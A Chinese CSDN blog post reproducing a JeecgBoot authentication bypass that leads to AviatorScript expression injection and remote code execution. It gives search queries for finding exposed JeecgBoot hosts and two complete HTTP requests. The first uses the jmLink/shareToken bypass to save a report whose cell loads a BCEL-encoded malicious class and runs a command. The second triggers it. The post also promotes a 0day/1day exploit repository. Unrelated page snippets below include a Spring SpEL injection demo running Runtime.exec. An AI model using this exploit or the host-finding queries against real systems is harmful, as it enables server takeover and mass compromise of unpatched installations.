【漏洞复现】JeecgBoot 权限绕过致AviatorScript表达式注入漏洞

于 2024-10-09 21:09:34 发布
阅读量435 收藏 4
点赞数 15
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48368964/article/details/142796625
版权


》》》产品描述《《《

        Jeecg Boot(或者称为 Jeecga-Boot)是一款基于代码生成器的开源企业级快速开发平台,专注于开发后台管理系统9、企业信息管理系统(MIS)等应用。它提供了一系列工具和模板,帮助开发者快速构建和部署现代化的 Web 应用程序。

》》》漏洞描述《《《

        JeecgBoot 存在权限绕过漏洞,未经身份验证的远程攻击者可构造jmLink、sharetoken参数或JmReport-Share-Token请求头绕过权限认证访问后台接口,进一步深入利用可实现远程代码执行、木马植入,导致服务器失陷等问题。

》》》搜索语句《《《

title=="JeecgBoot 企业级低代码平台" || body="window._CONFIG['imgDomainURL'] = 'http://localhost:8080/jeecg-boot/" || title="Jeecg-Boot 企业级快速开发平台" || title="Jeecg 快速开发平台" || body="'http://fileview.jeecg.com/onlinePreview'" || title=="JeecgBoot 企业级低代码平台" || title=="Jeecg-Boot 企业级快速开发平台" || title=="JeecgBoot 企业级快速开发平台" || title=="JeecgBoot 企业级快速开发平台" || title="Jeecg 快速开发平台" || title="Jeecg-Boot 快速开发平台" || body="积木报表" || body="jmreport"

》》》漏洞复现《《《

EXP

POST /jeecg-boot/jmreport/save?previousPage=1&jmLink=YWFhfHxiYm&shareToken=1&token=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.3
Accept: application/json, text/plain, */*
JmReport-Share-Token: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
 
{"designerObj":{"id":"123456","name":"test","type":"datainfo"},"name":"sheet1","freeze":"A1","freezeLineColor":"rgb(185, 185, 185)","styles":[],"displayConfig":{},"printConfig":{"paper":"A4","width":210,"height":297,"definition":1,"isBackend":false,"marginX":10,"marginY":10,"layout":"portrait","printCallBackUrl":""},"merges":[],"rows":{"0":{"cells":{"0":{"text":"=(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$5dP$cbN$c2$40$U$3d$D$a5$c5Z$FD$7c$r$s$ea$c6$c2$c2n$dca$dc$YLL$88$Y$n$eeK$bd$nC$da$vi$H$82$7f$a5$h5$$$fc$A$3f$cax$db$u$Q$t$99$fb89$e7$be$be$be$3f$3e$B$9c$e3$c0F$JU$h5le$a6na$dbBC$c0$bc$90J$eaK$81$a2$db$7c$Q0$ae$e2G$S$a8t$a5$a2$dbi4$a4d$e0$PCF$M$9aS$mp$eav$c7$fe$cc$f7B_$8d$bc$beN$a4$g$b5$9b$x$d0$5d$S$H$94$a6m$B$bb3$Ph$a2e$acR$L$3b$9c$f7$e3i$S$d0$b5$cc$aam$M$u$d5$9d$99$M$cf2$a9$D$T$96$85$5d$H$7b$d8w$60c$5d$e0$q$88$p$8f$e6$7e4$J$c9$8b$u$8a$93$t$c9$b1$af$b4$f7$a7$V$a8$$$h$f7$86c$K$b4$40$3d$87d$ec$dd$f4$W$D$I$d4$96$c4$fb$a9$d22$e2$Z$ec$R$e9E$d2pW$b7$f8$85$db8$86$c1g$cb$5e$B$o$9b$92m$99$b3C$f6$82$7d$a9$f5$G$f1$c2$81$c0$g$5b3$H$N$8ey$H$96d$d4$a3$5c$K$94$dfQh$bd$a2$f8$fc$8fm$c2$c95$7c$U$fe$9by$ab$ca$P$o$ZcR$b7$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()))+(c.exec(\"执行的命令\"));"}}},"len":100},"cols":{"len":50},"validations":[],"autofilter":{},"dbexps":[],"dicts":[],"loopBlockList":[],"zonedEditionList":[],"fixedPrintHeadRows":[],"fixedPrintTailRows":[],"rpbar":{"show":true,"pageSize":"","btnList":[]},"hiddenCells":[],"hidden":{"rows":[],"cols":[]},"background":false,"area":false,"dataRectWidth":0,"excel_config_id":"123456","pyGroupEngine":false,"querySetting":{"izOpenQueryBar":false,"izDefaultQuery":true}}

PS:写入恶意报表数据(Fastjson BCEL),Dnslog验证

提取id数据触发漏洞,实现RCE

POST /jeecg-boot/jmreport/show?previousPage=1&jmLink=YWFhfHxiYm&shareToken=1&token=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.3
Accept: application/json, text/plain, */*
JmReport-Share-Token: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
 
{"id":"123456"}

PS:text处写入的恶意类会执行,回显null

》》》修复建议《《《

目前厂商已经发布了新版本以修复此安全问题,建议受影响用户升级至最新版本
http://www.jeecg.com/ 

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

A 八方
关注
专栏目录
C1认证备考记录
qq_40983811的博客
02-07 356
C认证
CSDN C1认证 考试流程讲解
m0_62360527的博客
06-21 2280
CSDN C1认证 考试流程讲解
C1认证总结
m0_55422956的博客
03-01 2215
C1 认证总结 用时一周时间,通过对C1整体内容的学习,我收获了很多,分享以下几点: 深刻的思维碰撞 C1的任务过程中,我们有和多时间都是在小组的讨论,讨论题怎么做,某个知识点怎样理解,讨论怎样可以快速的完成任务, ...
C1认证经验总结
一个优秀的极客「白泽」
12-23 5267
C1认证经验总结 在前段时间,突然看到CSDN官方举行了CSDN软件开发精英赛,抱着试试看的态度报考。最终获得了第五名的成绩,因此对自己的备考经验做一总结:CSDN软件开发精英赛(首赛)精英榜 1. 什么是C1认证? 从官网的介绍来开,通过C1认证,表明持有人具有软件开发所必需的基础知识,具备“计算机通识”、“程序逻辑”和“Web基础”能力,其中程序逻辑使用JavaScript语言作为编程语言。确保持有者是可以从事软件开发相关的见习/实习类岗位工作的。也就是说,如果能通过C1的认证,你就已经具备了在公司中实
C1认证之计算机通识知识及习题总结——我的学习笔记
qq_46007633的博客
04-17 2283
文章目录 目录 文章目录 前言 一、进制转换 知识点 习题 二、信息单位 知识点 习题 三、数据校验 知识点 做题思路 习题 四、多媒体基础参数 知识点 习题 五、HTTP 知识点 习题 六、HTTPS 知识点 习题 七、OSI七层模型 知识点 习题 八、IP基础 知识点 习题 九、IPv6 知识点 习题 十、网络拓扑 知识点 习题 十一、域名解析 知识点 习题 十二、常用网络命令和端口 知识点 习题 十三、数据结构常识.
C1认证学习体验
m0_55422699的博客
03-02 3961
#C1认证学习体验 ##一、四个项目内容 1、通过修改植物大战僵尸来了解进制之间的知识; 2、通过给宿舍分配IP地址学习子网掩码; 3、通过制作静态网页来学习HTML和CSS; 4、通过表单、表格来学习前端相关知识。 ##二、C1认证完成情况 通过一周的努力对C1认证进行学习,我们采用学习小组的模式来进行讨论,因为我属于技术小白,在学习前两个项目的时候虽然有所疑惑但是还不算吃力,前两个项目均完成,第三个项目通过技术老师的讲解,也可以做出来,第四个任务涉及JS的很多内容,JS对于一个技术小白来说,一周的时间学
C1认证内容-HTTP
q1475312190的博客
01-22 2008
文章目录一、HTTP是什么二、HTTP请求头和响应头的格式和作用1.General2.Response Hearderd3.Requset Headers三、Cookie和Session 一、HTTP是什么 超文本传输协议(Hyper Text Transfer Protocol,HTTP)是一个简单的请求-响应协议,它通常运行在TCP之上。它指定了客户端可能发送给服务器什么样的消息以及得到什么样的响应。HTTP的运行机制为客户端发起请求,服务端返回响应。 二、HTTP请求头和响应头的格式和作用 在谷
c1认证(web进阶篇)
ceike的博客
08-06 641
其实学习开发web前端也有半年了,经过这次专业认证学习,发现自己的不足之处比自己想象中的要多的多;也意识到,了解,熟悉,与精通之间的差距;这一周多的时间里,让我受益和感触最深的就是,用马云先生的一句话:"因小而美,因小而伟大"; The best asset you have is that you are young. Don't complain. Let the other people complain. The opportunity lie, always lies where p....
CSDN C1认证 任务03
ViktorChen的博客
05-19 968
CSDN C1认证 任务03
C1认证的第二天
m0_55422699的博客
02-21 377
#员工宿舍网络接入项目感受 ##一、项目内容 使用C类IP将四个宿舍进行划分 ##二、项目完成情况 通过一天的努力,首先是通过网络等工具在网上进行资料的获取,了解子网、IP地址。经过玉龙老师的讲解后,两组人员进行讨论,最后得出最终的结果 ##三、项目中的知识点 1、复习第一个项目计算机进制内容; 2、了解A、B、C类IP地址; 3、掌握子网运算。 ##4、项目完成感受 1、计算机的知识点都有互通的内容,今天的第二个项目就跟昨天的第一个项目有相互关联的东西,其实计算机的知识每个单点都不能说难,只不过是需要良好
C1认证知识总结——计算机通识+Web基础+JS基础+Web进阶
07-16
csdn见习工程师认证,适合编程小白,零基础学编程。C1认证知识总结——计算机通识+Web基础+JS基础+Web进阶!!!收藏+加关注+评论1 免费获取
C1认证模拟题卷4套(含答案)
04-25
C1认证是针对信息技术(IT)专业人士的一项资格认证,它旨在验证个人在特定技术领域内的专业知识和技能。这个压缩包包含四套C1认证的模拟题卷,每套都附有答案,对于备考C1认证的考生来说是非常有价值的资源。 首先...
见习软件工程师c1认证 JavaScript基础
09-29
就是c认证里的任务训练下的知识点;js中(其他高级程序语言)的基本语法;如变量命名规范等;不涉及dom和bom;用的Typora生成文件;
初级软件工程师c1认证,web基础重点
09-28
希望认证的小伙伴可以看下知识点再决定是否报考;涵盖前端表单基础知识和应用(例题即案例,比如如何将内容提交到指定位置,这些简单但实用的知识)SEO引擎优化,移动端定义全屏,target我觉得最重要的还是对内容的...
【网络安全 | JAVA代码审计】基础安全问题和解决方法初探
等风来
10-02 683
无占位符的预处理,其实质仍然是通过字符串拼接的方式来构造SQL语句,SQL注入依然存在,这是开发中需要谨记的。
【超强组合】基于淘金优化算法GRO-BP-Adaboost的数据分类预测算法Matlab实现.rar
最新发布
10-08
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
VMware Workstation Pro 和 VMware Fusion 安装与配置指南
10-08
内容概要:本文档详细指导了如何在不同的主机环境下,通过 VMWare 的两款产品——Workstation Pro 和 Fusion 进行新虚拟机的构建流程以及具体的操作要点说明。 适用人群:希望在单一机器上部署多操作系统的工作环境或学习测试场景的技术人员和学生。 使用场景及目标:旨在帮助初学者搭建属于自己的虚拟机实验平台,从而方便进行软件测试或者研究操作系统相关的新特性等任务,同时也有利于团队间的协作和资源调配。 注意事项:文中涉及的具体操作如下载源文件、配置网络参数时要注意版权合法性问题和技术安全防范。此外还需依据各自电脑的软硬件条件适当增减虚拟机的资源设定。
科研经费管理系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS).zip
10-08
科研经费管理系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS) 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
使用Python Matplotlib进行图形输出与保存详解(包含详细的完整的程序和数据)
10-08
内容概要:本文详细介绍了使用 Python 的 Matplotlib 库来输出和保存图形的方法。不仅涉及了基本流程,如生成图表并将之导出成PNG、PDF和SVG等不同格式的内容,还包括高级话题如设置透明度、分辨率以及制作包含图形元素的HTML页面等。文章通过一个具体的示例代码讲解了各个环节的关键细节和技术要点。 适用人群:对数据可视化有兴趣的初学者及具有一定基础想要深入学习 Matplotlib 使用技巧的技术人员。 使用场景及目标:适用于需要掌握 Matplotlib 不同输出选项及其特点的应用场合,尤其是当需要生成用于打印或网页展示的高质量、可自定义外观的图形时。
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析与复现。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的方法、进行条件判断等操作。在SpringBoot中,SpEL表达式可以用于注解中的属性值、配置文件中的属性值等场景。 在SpEL表达式中,可以使用一些特殊的语法来引用Bean对象或调用Bean对象的方法。例如,可以使用`#{beanName.methodName()}`的语法来调用Bean对象的方法。如果在SpEL表达式中使用了未经过滤的用户输入,就会存在SpEL表达式注入漏洞。 攻击者可以通过构造恶意的SpEL表达式,将其注入到应用中,从而执行恶意代码。例如,可以将`#{T(java.lang.Runtime).getRuntime().exec('calc')}`注入到应用中,从而在受害者机器上执行计算器程序。 二、漏洞复现 下面我将通过一个简单的漏洞复现来说明SpEL表达式注入漏洞的危害性。 1. 创建一个SpringBoot应用 首先,我们需要创建一个SpringBoot应用。可以使用Spring Initializr来快速创建一个基本的SpringBoot应用。 2. 添加注解 在创建好的SpringBoot应用中,我们可以添加一个Controller类,并在其中添加一个RequestMapping注解。在RequestMapping注解中,我们可以使用SpEL表达式来引用Bean对象或调用Bean对象的方法。 ```java @RestController public class MyController { @RequestMapping("/test") public String test() { return "hello world"; } @RequestMapping(value = "/{name}", method = RequestMethod.GET) public String sayHello(@PathVariable("name") String name) { return "Hello " + name + "!"; } @RequestMapping(value = "/spel", method = RequestMethod.GET) public String spel() { String expression = "#{T(java.lang.Runtime).getRuntime().exec('calc')}"; ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(expression); return exp.getValue().toString(); } } ``` 在上述代码中,我们在/spel接口中使用了SpEL表达式来调用Runtime.getRuntime().exec方法,从而执行计算器程序。 3. 启动应用 启动应用后,访问/spel接口,可以看到计算器程序被成功执行。 4. 防范措施 为了防范SpEL表达式注入漏洞,我们可以采取以下措施: 1. 对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。 2. 尽量避免在注解或配置文件中使用SpEL表达式。 3. 对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。 4. 在应用中禁用动态表达式功能,避免SpEL表达式被执行。 5. 总结 SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码。为了防范该漏洞,我们需要对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。同时,尽量避免在注解或配置文件中使用SpEL表达式,对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值